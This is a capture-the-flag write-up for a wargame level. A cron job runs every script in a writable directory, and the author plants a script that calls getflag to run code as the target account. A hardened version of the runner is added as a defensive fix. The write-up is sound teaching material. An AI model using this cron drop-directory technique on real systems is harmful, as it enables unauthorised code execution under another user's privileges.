
### Level 03

#### Introduction

In this example we are told to look at the directory /home/flag03 and that there is a crontab that runs every few minutes. That directory contains the file writable.sh, which contains the code:

```sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done
```

This runs every file in the writable.d directory. I assume this is the file being run by the cron job.

#### Exploit

Since /home/flag03/writable.d is writable, I create a simple bash script that will run the getflag command and pipe output to a file so that I can confirm it ran:

```sh
#!/bin/bash
/bin/getflag >> /tmp/proof
```

I waited a few minutes and sure enough /tmp/proof contained `You have successfully executed getflag on a target account`
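
A stricter version of the cron runner, as an added example that is not part of the original write-up or the level's own code: it refuses to execute anything unless the drop directory and each script are owned by the expected account and are not writable by group or others. The function names `is_trusted` and `run_dropdir`, the ownership rule, and the use of `sh` instead of `bash -x` are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: a stricter take on writable.sh. The trust rule (only the
# owner may write) and the function names are assumptions, not the level's code.

# Succeeds only if path $1 is of kind $2 (d or f), is not a symlink,
# is owned by user $3, and is not writable by group or other.
is_trusted() {
    path=$1 kind=$2 owner=$3
    [ ! -L "$path" ] || return 1
    [ -n "$(find "$path" -prune -type "$kind" -user "$owner")" ] || return 1
    [ -z "$(find "$path" -prune \( -perm -020 -o -perm -002 \))" ]
}

# Runs the scripts in directory $1 only when the directory and each script
# pass is_trusted for user $2. Returns non-zero if anything was refused.
run_dropdir() {
    dir=$1 owner=$2 refused=0
    if ! is_trusted "$dir" d "$owner"; then
        echo "refusing $dir: not owned by $owner or writable by others" >&2
        return 1
    fi
    for i in "$dir"/*; do
        [ -e "$i" ] || continue          # empty directory: glob did not match
        if is_trusted "$i" f "$owner"; then
            (ulimit -t 5; sh "$i")       # same CPU limit as the original loop
            rm -f "$i"
        else
            echo "skipping untrusted file $i" >&2   # left in place for review
            refused=1
        fi
    done
    return "$refused"
}
```

With a directory that only its owner can write to, nobody else can swap a file between the check and the run; a world-writable directory fails the first check and nothing in it is executed.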